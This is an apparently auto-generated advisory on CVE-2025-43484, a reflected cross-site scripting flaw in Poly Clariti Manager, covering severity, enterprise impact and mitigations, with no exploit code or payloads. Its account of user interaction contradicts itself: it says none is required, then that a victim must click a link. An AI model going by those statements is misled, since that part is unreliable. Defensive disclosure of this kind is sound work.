CVE-2025-43484 is a reflected Cross-Site Scripting (XSS) vulnerability identified in HP Inc.'s Poly Clariti Manager software versions prior to 10.12.1. The vulnerability arises due to improper neutralization of user input during web page generation, classified under CWE-79. Specifically, the web interface of Poly Clariti Manager fails to properly validate or sanitize user-supplied input before reflecting it back in the HTTP response. This flaw allows an attacker to craft malicious URLs or input that, when processed by the vulnerable web application, results in the execution of arbitrary JavaScript code in the context of the victim's browser. The CVSS 4.0 base score is 6.0 (medium severity), with the vector indicating an attack vector of adjacent network (AV:A), low attack complexity (AC:L), no privileges required (PR:N), no user interaction (UI:N), and high impact on confidentiality (VC:H) but no impact on integrity or availability. The vulnerability does not require authentication or user interaction, increasing its risk profile. However, the attack vector being adjacent network suggests exploitation requires network proximity, such as within the same LAN or VPN. HP has addressed this vulnerability in version 10.12.1 of Poly Clariti Manager. No known exploits are currently reported in the wild. Poly Clariti Manager is a management platform used for unified communications and collaboration devices, often deployed in enterprise environments to manage voice and video endpoints. The vulnerability could be exploited by an attacker to steal session cookies, perform actions on behalf of authenticated users, or conduct phishing attacks by injecting malicious scripts. Given the nature of reflected XSS, the attacker typically needs to lure a user into clicking a crafted URL or visiting a malicious site that triggers the vulnerability.

For European organizations, especially those in sectors relying on unified communications and collaboration tools, this vulnerability poses a moderate risk. Exploitation could lead to unauthorized disclosure of sensitive session information, enabling attackers to hijack user sessions or escalate privileges within the management platform. This could compromise the confidentiality of communications infrastructure management, potentially allowing attackers to manipulate device configurations or intercept communications. The reflected XSS nature means that the attack requires user interaction (clicking a malicious link), but no authentication is needed, making it easier for attackers to target employees. Organizations with Poly Clariti Manager deployed in internal networks or accessible via VPN are particularly at risk due to the adjacent network attack vector. The impact on confidentiality is high, but integrity and availability remain unaffected directly. However, indirect impacts such as loss of trust, regulatory non-compliance (e.g., GDPR if personal data is exposed), and operational disruption due to compromised management consoles are possible. The absence of known exploits in the wild reduces immediate risk but does not eliminate the threat, especially as attackers may develop exploits following public disclosure.

European organizations should prioritize updating Poly Clariti Manager to version 10.12.1 or later, where the vulnerability is patched. Until patching is possible, organizations should implement strict input validation and output encoding on any web-facing interfaces or proxy layers to mitigate reflected XSS risks. Employing Web Application Firewalls (WAFs) with rules targeting XSS payloads can provide temporary protection. Network segmentation should be enforced to limit access to the Poly Clariti Manager interface to trusted internal users only, reducing exposure to adjacent network attackers. Security awareness training should inform users about the risks of clicking unsolicited links, especially those related to internal management tools. Monitoring logs for suspicious URL patterns or unusual access attempts can help detect exploitation attempts. Additionally, enforcing multi-factor authentication (MFA) on the management platform can reduce the impact of session hijacking if credentials are compromised. Regular security assessments and penetration testing focusing on web application vulnerabilities are recommended to identify and remediate similar issues proactively.